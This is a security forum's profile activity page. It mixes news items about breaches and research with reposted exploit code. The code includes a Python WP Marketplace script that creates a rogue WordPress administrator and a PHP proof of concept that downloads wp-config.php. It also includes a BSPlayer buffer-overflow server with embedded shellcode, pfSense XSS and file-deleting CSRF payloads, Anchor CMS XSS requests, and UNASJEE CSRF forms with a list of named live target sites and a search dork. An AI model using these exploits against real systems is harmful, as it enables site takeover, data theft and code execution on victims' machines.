Jump to content

Aerosol

Active Members
 View Profile  See their activity

  • Posts

    3453

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Everything posted by Aerosol

  1. Aerosol
    GitHub has been ordered to hand over records on some of its users to taxi-booking app Uber after unsuccessfully challenging a subpoena. Last month, Uber announced its driver database had been hacked in May 2014, but it had only noticed in September of that year. Uber discovered that a supposedly secret database access key had somehow ended up in a couple of Gists in a public area of GitHub. It's alleged this key was spotted by miscreants who used the key to delve into Uber's internal database of driver names and license plates. Uber asked GitHub to hand over the web access logs for the two Gist pages for the May-September period. GitHub refused, and so on 27 February this year, Uber created a John Doe lawsuit in order to subpoena GitHub to hand over the logs. Earlier this month, GitHub challenged the subpoena in a San Francisco court but lost, with the judge late last week giving GitHub 30 days to comply. Uber argued during the hearing that the two Gist posts (both of which have been offline since the lawsuit was filed) should have had very little traffic, and the data on who visited them "should generally reveal people, who were affiliated with Uber and who worked on the Uber code near the time of the unauthorized download." The judge also found that Uber had "shown that its need for early discovery outweighs the prejudice to GitHub, as GitHub is an established provider who routinely deals with discovery requests and would suffer little burden from producing the requested information." In other words: hand it over, GitHub. We asked GitHub and Uber to comment on the case; both companies are based around the corner from our office in San Francisco. GitHub told us: "We don't have any additional info to share." Uber's lawyer has yet to return our call or email. Source
  2. Aerosol
    Romanian citizen Mircea-Ilie Ispasoiu made his first appearance in a New Jersey federal court after being extradited to the U.S. for allegedly orchestrating an international hacking scheme. The cyber attack targeted medical offices, retailers, security companies and United States residences, according to a Department of Justice release. Between 2011 and 2014, Ispasoiu worked as a computer systems administrator at a large Romanian financial institution. There he allegedly hacked into multiple private and business networks, including a company that ran background checks. He was able to access thousands of credit and debit card numbers and personal identifiers. Ispasoiu is facing multiple charges of aggravated identity theft, unauthorized computer access to obtain information, unauthorized computer access that caused damage, and wire fraud. If convicted, he could face more than 30 years in prison and millions of dollars in fines. Source
  3. Aerosol
    #!/usr/bin/python # # Exploit Name: WP Marketplace 2.4.0 Remote Command Execution # # Vulnerability discovered by Kacper Szurek (http://security.szurek.pl) # # Exploit written by Claudio Viviani # # # # -------------------------------------------------------------------- # # The vulnerable function is located on "wpmarketplace/libs/cart.php" file: # # function ajaxinit(){ # if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ # if(function_exists($_POST['execute'])) # call_user_func($_POST['execute'],$_POST); # else # echo __("function not defined!","wpmarketplace"); # die(); # } #} # # Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook). # wpmp_pp_ajax_call() call functions by call_user_func() through POST data: # # if (function_exists($_POST['execute'])) # call_user_func($_POST['execute'], $_POST); # else # ... # ... # ... # # $_POST data needs to be an array # # # The wordpress function wp_insert_user is perfect: # # http://codex.wordpress.org/Function_Reference/wp_insert_user # # Description # # Insert a user into the database. # # Usage # # <?php wp_insert_user( $userdata ); ?> # # Parameters # # $userdata # (mixed) (required) An array of user data, stdClass or WP_User object. # Default: None # # # # Evil POST Data (Add new Wordpress Administrator): # # action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator # # --------------------------------------------------------------------- # # Dork google: index of "wpmarketplace" # # Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6 # # Http connection import urllib, urllib2, socket # import sys # String manipulator import string, random # Args management import optparse # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ __ __ __ | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----. |. | _ | _| <| -__| _| _ | | _ | __| -__| |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| |: | | |__| |::.|:. | `--- ---' WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) v2.4.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target: print(banner) commandList.print_help() sys.exit(1) host = checkurl(options.target) timeout = options.timeout print(banner) socket.setdefaulttimeout(timeout) username = id_generator() pwd = id_generator() body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call', 'execute' : 'wp_insert_user', 'user_login' : username, 'user_pass' : pwd, 'role' : 'administrator'}) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} print "[+] Tryng to connect to: "+host try: req = urllib2.Request(host+"/", body, headers) response = urllib2.urlopen(req) html = response.read() if html == "": print("[!] Account Added") print("[!] Location: "+host+"/wp-login.php") print("[!] Username: "+username) print("[!] Password: "+pwd) else: print("[X] Exploitation Failed :(") except urllib2.HTTPError as e: print("[X] "+str(e)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e)) Source
  4. Aerosol
    Advisory ID: HTB23251 Product: pfSense Vendor: Electric Sheep Fencing LLC Vulnerable Version(s): 2.2 and probably prior Tested Version: 2.2 Advisory Publication: March 4, 2015 [without technical details] Vendor Notification: March 4, 2015 Vendor Patch: March 5, 2015 Public Disclosure: March 25, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352] CVE References: CVE-2015-2294, CVE-2015-2295 Risk Level: Medium CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via CSRF (Cross-Site Request Forgery) attacks. Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root privileges, steal administrator’s cookies and gain complete control over the web application and even the entire system, as pfSense is running with root privileges and allows OS command execution via its web interface. 1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294 1.1 Input passed via the "zone" HTTP GET parameter to "/status_captiveportal.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. PoC code below uses JS "alert()" function to display "ImmuniWeb" popup: https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.2 Input passed via the "if" and "dragtable" HTTP GET parameters to "/firewall_rules.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. Below are two PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup: https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.3 Input passed via the "queue" HTTP GET parameter to "/firewall_shaper.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. PoC code below uses JS "alert()" function to display "ImmuniWeb" popup: https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.4 Input passed via the "id" HTTP GET parameter to "/services_unbound_acls.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. PoC code below uses JS "alert()" function to display "ImmuniWeb" popup: https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.5 Input passed via the "filterlogentries_time", "filterlogentries_sourceipaddress", "filterlogentries_sourceport", "filterlogentries_destinationipaddress", "filterlogentries_interfaces", "filterlogentries_destinationport", "filterlogentries_protocolflags" and "filterlogentries_qty" HTTP GET parameters to "/diag_logs_filter.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. Below are eight PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup: https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 2) Cross-Site Request Forgery (CSRF) in pfSense: CVE-2015-2295 2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in "/system_firmware_restorefullbackup.php" script. A remote attacker can trick a log-in administrator to visit a malicious page with CSRF exploit and delete arbitrary files on the target system with root privileges. The following PoC code deletes file "/etc/passwd": https://[host]/system_firmware_restorefullbackup.php?deletefile=../etc/passwd ----------------------------------------------------------------------------------------------- Solution: Update to pfSense 2.2.1 More Information: https://blog.pfsense.org/?p=1661 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23251 - https://www.htbridge.com/advisory/HTB23251 - Arbitrary file deletion and multiple XSS vulnerabilities in pfSense. [2] pfSense - https://www.pfsense.org - The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source
  5. Aerosol
    @shadowSQLi nu stiu daca au rezolvat ( nu cred).
  6. Aerosol
    When heat from one computer is emitted and detected by an adjacent computer, a channel can be opened that researchers are claiming can facilitate the spread of keys, passwords and even malware. According to researchers from the Cyber Security Research Center at Ben Gurion University in Israel, the bridge, something they’ve dubbed BitWhisper, can allow for communication between the two air-gapped machines. Researchers Mordechai Guri and Matan Munitz discovered the method and were overseen by Yuval Elovici, a professor at the school’s Department of Information Systems Engineering. The three plan to publish a paper on their research, “BitWhisper: Covert Signaling Channel between Air-Gapped Computers Using Thermal Manipulations,” soon. To connect two otherwise separate computers – a common sight in specialized computer labs, military networks, etc. – the channel relies on something the researchers call “thermal pings,” the repeated fusion of two networks via proximity and heat. This helps grant a bridge between the public network and the internal network. “At this stage, the attacker can communicate with the formerly isolated network, issuing commands and receiving responses,” the report reads. Once the airgap has been bridged, attackers can do a handful of things, including using the channel to spread keys, unleash a worm, send a command to an industrial control system, or spread malware to other parts of the network. “BitWhisper provides a feasible covert channel, suitable for delivering command and control (C&C) messages, and leaking short chunks of sensitive data such as passwords,” the paper warns. In a video posted to YouTube, the researchers demonstrate how they were able to send a command from one machine to another in order to reposition and then launch a small, toy missle: For their study the researchers positioned personal computers next to one another – side-by-side, back-to-back, even stacked on top of each other – to determine how quickly data traveled between the two. The researchers then ran the machines through a rigorous series of calculations and “busy loops” in order to get them to give off more heat. From there they were able to gauge which of the computers’ temperature sensors were affected by a difference in heat and in turn could be manipulated. Guri and company were left with a complicated attack environment that’s dependent upon multiple, highly-calibrated parameters being set in place in order to carry out an attack. It’s not the speediest method to transfer information – the thermal signal’s rate of change between computers can be slow – very slow – oftentimes taking several minutes to transfer just one signal; at the most, BitWhisper can process eight signals per hour. While slow, the team’s video helps illustrate that the mode of transfer is possible but it just may make more sense to transfer small bits of information. The attack requires no special hardware or additional components, it just requires that both machines are infected by malware. On top of that the channel is bi-directional, meaning the sender could be the receiver in some instances. The attack should work as long as one computer is producing heat and another is monitoring that heat. End-users who wanted to theoretically prevent an attack like this from happening could keep computers far apart from each other. While that may seem like the most sensible move, researchers stress it may be difficult. “Keeping minimal distances between computers is not practical,” the researchers said, “and obviously, managing physical distances between different networks has its complexity in terms of space and administration overheads that increases with every air-gap network used.” Guri and a trio of researchers found a technique last year to use FM waves for data exfiltration. Guri and his team presented the malicious program, AirHopper, at MALCON, a conference in Mumbai last year, and showed how it could be used to decode a radio signal sent from a computer’s video card. That attack helped clarify what is and isn’t possible when it comes to staging threats against air-gapped machines. The threat landscape is a field of great interest to researchers at the university. Going forward Guri states that he and his team are hoping to see if they can get two computers to send and receive information at the same time and to see if it’s possible to get two computers in the same room, giving off heat, to boost the channel’s effective transmission range. Source
  7. Aerosol
    A security researcher says there is a bug in the Instagram API that could enable an attacker to post a message with a link to a page he controls that hosts a malicious file, but when the user downloads the file it will appear to come from a legitimate Instagram domain, leading the victim to trust the source. The issue, a reflected filename download bug, lies in the public API for the Instagram service, which is owned by Facebook. Researcher David Sopas of WebSegura in Portugal found that by using the access token from any user’s account, pasting some code into the bio field in a user’s account and using some other little tricks, he could produce a file download link that seems to be hosted on a legitimate Instagram domain. “This time I found a RFD on Instagram API. No need to add any command on the URL because we will use a persistent reflected field to do that. Like “Bio” field on the user account. What we need? A token. No worries we just need to register a new user to get one,” Sopas wrote in a post explaining the bug and exploitation technique. “Next step: Insert the batch command we want to use in the user account Bio field [and maybe others]. I’ll try to open a Chrome new window with a malicious page disabling most the protections from this browser.” Sopas found that the technique works on Chrome, Opera, Chrome for Android, the Android stock browser and Firefox in some circumstances. In order to make it work, he also constructed a specific filename, and when a victim clicks on a link in the attacker’s Instagram message, she will be taken to an attacker-controlled page with a file that appears to be on an Instagram domain. The video above demonstrates the technique. The attacker could host any malicious file he chooses at the target location, including malware. Sopas said he has been unable to convince Facebook security engineers that RFD issues are security vulnerabilities. He said they told him the issue was not a priority. “Many companies still don’t understand that RFD is very dangerous and combined with other attacks like phishing or spam it could lead to massive damage,” Sopas said via email. “[imagine] a phishing campaign where the link of the email is really from Instagram?” Source
  8. Aerosol
    # Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download # Date: 26-10-2014 # Software Link: https://wordpress.org/plugins/wpmarketplace/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps # CVE: CVE-2014-9013 and CVE-2014-9014 1. Description Anyone can run user defined function because of call_user_func. File: wpmarketplace\libs\cart.php function ajaxinit(){ if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ if(function_exists($_POST['execute'])) call_user_func($_POST['execute'],$_POST); else echo __("function not defined!","wpmarketplace"); die(); } } http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html 2. Proof of Concept $file = '../../../wp-config.php'; $url = 'http://wordpress-url/'; $user = 'userlogin'; $email = 'useremail@email.email'; $pass = 'password'; $cookie = "/cookie.txt"; $ckfile = dirname(__FILE__) . $cookie; $cookie = fopen($ckfile, 'w') or die("Cannot create cookie file"); // Register $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array( 'register_form' => 'register', 'reg[user_login]' => $user, 'reg[user_email]' => $email, 'reg[user_pass]' => $pass )); $content = curl_exec($ch); if (!preg_match("/success/i", $content)) { die("Cannot register"); } // Log in curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php'); curl_setopt($ch, CURLOPT_POSTFIELDS, array( 'log' => $user, 'pwd' => $pass, 'wp-submit' => 'Log%20In' )); $content = curl_exec($ch); if (!preg_match('/adminmenu/i', $content)) { die("Cannot login"); } // Add subscriber as plugin admin curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, array( 'action' => 'wpmp_pp_ajax_call', 'execute' => 'wpmp_save_settings', '_wpmp_settings[user_role][]' => 'subscriber' )); $content = curl_exec($ch); if (!preg_match('/Settings Saved Successfully/i', $content)) { die("Cannot set role"); } // Request noonce curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, array( 'action' => 'wpmp_pp_ajax_call', 'execute' => 'wpmp_front_add_product' )); $content = curl_exec($ch); preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce); if (strlen($nonce[1]) < 2) { die("Cannot get nonce"); } // Set file to download curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, array( '__product_wpmp' => $nonce[1], 'post_type' => 'wpmarketplace', 'id' => '123456', 'wpmp_list[base_price]' => '0', 'wpmp_list[file][]' => $file )); $content = curl_exec($ch); header("Location: ".$url."?wpmpfile=123456"); 3. Solution: Update to version 2.4.1 https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip Source
  9. Aerosol
    Problema RST-ului sunt useri ce s-au inregistrat dupa 2012 (exista excepti, ca de exemplu @Rubaka continutul nu a fost gasit ( pe orice facebook incerc.)
  10. Aerosol
    #!/usr/bin/python ''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL. In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full address and then used backward jumping to jump to a long jump that eventually land in my shellcode. Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try My twitter: @fady_osman My youtube: [url]https://www.youtube.com/user/cutehack3r[/url] ''' import socket import sys s = socket.socket() # Create a socket object if(len(sys.argv) < 3): print "[x] Please enter an IP and port to listen to." print "[x] " + sys.argv[0] + " ip port" exit() host = sys.argv[1] # Ip to listen to. port = int(sys.argv[2]) # Reserve a port for your service. s.bind((host, port)) # Bind to the port print "[*] Listening on port " + str(port) s.listen(5) # Now wait for client connection. c, addr = s.accept() # Establish connection with client. # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload. print(('[*] Sending the payload first time', addr)) c.recv(1024) #seh and nseh. buf = "" buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31" buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a" buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94" buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01" buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5" buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7" buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f" buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7" buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34" buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80" buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3" buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5" buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5" buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c" buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15" buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c" buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22" buf += "\x8c\xcd\x11\xc2\x37\x12" jmplong = "\xe9\x85\xe9\xff\xff" nseh = "\xeb\xf9\x90\x90" # Partially overwriting the seh record (nulls are ignored). seh = "\x3b\x58\x00\x00" buflen = len(buf) response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000 c.send(response) c.close() c, addr = s.accept() # Establish connection with client. # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload. print(('[*] Sending the payload second time', addr)) c.recv(1024) c.send(response) c.close() s.close() Source
  11. Aerosol
    #Affected Vendor: http://anchorcms.com/ #Date: 23/03/2015 #Discovered by: JoeV #Type of vulnerability: XSS #Tested on: Windows 7 #Version: 0.9.2 #Description: Anchor CMS v 0.9.2 is susceptible to Cross Site Scripting attack. Proof of Concept (PoC): --------------------------- *XSS* --- POST /anchor/index.php/admin/pages/add HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 1003 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4w4M5e7r1tBwc2wp Referer: http://localhost/anchor/index.php/admin/pages/add Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: anchor-install-timezone=-330; anchorcms-install=kIlKh79lcE6sWxZBwoSMI2eN4LuqpHgK; anchorcms-install_payload=ZDYyYjliOTEyMzhlNjJjYmVjZTg0ZmFkNmMxMGRlMDRhOjM6e3M6NDoiX291dCI7YTowOnt9czozOiJfaW4iO2E6MDp7fXM6ODoiaHRhY2Nlc3MiO3M6Mzg4OiJPcHRpb25zIC1pbmRleGVzCgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KCVJld3JpdGVFbmdpbmUgT24KCVJld3JpdGVCYXNlIC9hbmNob3IKCgkjIEFsbG93IGFueSBmaWxlcyBvciBkaXJlY3RvcmllcyB0aGF0IGV4aXN0IHRvIGJlIGRpc3BsYXllZCBkaXJlY3RseQoJUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKCVJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kCgoJIyBSZXdyaXRlIGFsbCBvdGhlciBVUkxzIHRvIGluZGV4LnBocC9VUkwKCVJld3JpdGVSdWxlIF4oLiopJCBpbmRleC5waHAvJDEgW0xdCjwvSWZNb2R1bGU%2BCgo8SWZNb2R1bGUgIW1vZF9yZXdyaXRlLmM%2BCglFcnJvckRvY3VtZW50IDQwNCBpbmRleC5waHAKPC9JZk1vZHVsZT4KIjt9; anchorcms=u8h0s9Vjh9LUAM56y7TDWBFolw8tJxxC ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="token" 286db1269c0e304c7e435bf10251f950 ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="title" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="redirect" ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="content" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="name" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="slug" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="status" published ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="parent" 1 ------WebKitFormBoundary4w4M5e7r1tBwc2wp-- -- Regards, *Joel V* Source
  12. Aerosol
    .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com ############################################################ Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu http://milw00rm.com / http://fiXen.org ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : UNASJEE CMS |~Affected Version : All Version |~Vendor : http://www.unasjee.net/ |~DORK : intext:Designed & Developed by: UNASJEE |~RISK : High |~Date: 22.03.2015 |~Tested On : [L] Kali Linux ####################INFO################################ admin panel without login It is possible to post data the server will accept absolute. ######################################################## Demo and Tested on; http://turnnersports.com http://www.badhawaind.com http://www.cliftonintl.com http://www.aqnaf.com http://shanisports.com http://tayyabgarments.com http://www.shreentrader.com http://www.moosaleathers.com ---------------------------------------------------------- ---------------------------------------------------------- Change Profile Detai PoC ---------------------------------------------------------- <!-- Change Profile Detail --> <body> <form action="http://[TARGET]/admincp/updprofile.php" method="POST"> <input type="hidden" name="pfid" value="1" /> <input type="hidden" name="sFullDescription" value="HACKERRRRRRR" /> <input type="hidden" name="p1" value="HACKERRRRRRR" /> <input type="hidden" name="Submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body> </html> ---------------------------------------------------------- Add News PoC ---------------------------------------------------------- <form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();"> <tr> <td valign="top" bgcolor="E8EEF3"><strong> Title: </strong><span class="error">*</span> </td> <td valign="top" bgcolor="E8EEF3"> <input name="ntitle" type="text" class="txtdefault" id="ntitle"> </td> </tr> <tr> <td valign="top" bgcolor="E8EEF3"><strong> Date: </strong><span class="error">*</span></td> <td valign="top" bgcolor="E8EEF3"> <input name="nDate" type="text" class="txtdefault" id="nDate"> (YYYY-MM-DD)</td> </tr> <tr> <td width="25%" valign="top" bgcolor="E8EEF3"><strong> News:<span class="error"> </span></strong><span class="error">*</span></td> <td width="75%" valign="top" bgcolor="E8EEF3"> <textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td> </tr> <tr> <td bgcolor="E8EEF3"> </td> <td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td> </tr> </form> </table></td> </tr> </table></td> </tr> <tr> <td align="center"><img src="imgs/spacer.GIF" width="1" height="30"></td> </tr> </table></td> </tr> </table></td> </tr> <tr> ---------------------------------------------------------- Add Products PoC ---------------------------------------------------------- <td valign="top"><table width="450" border="0" cellpadding="1" cellspacing="2"> <form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();"> <tr> <td width="29%" valign="top" bgcolor="E8EEF3"> <strong>Name:</strong></td> <td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName"> <font color="#FF0000">*</font></td> </tr> <tr> <td bgcolor="E8EEF3"> <strong>Show:</strong></td> <td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td 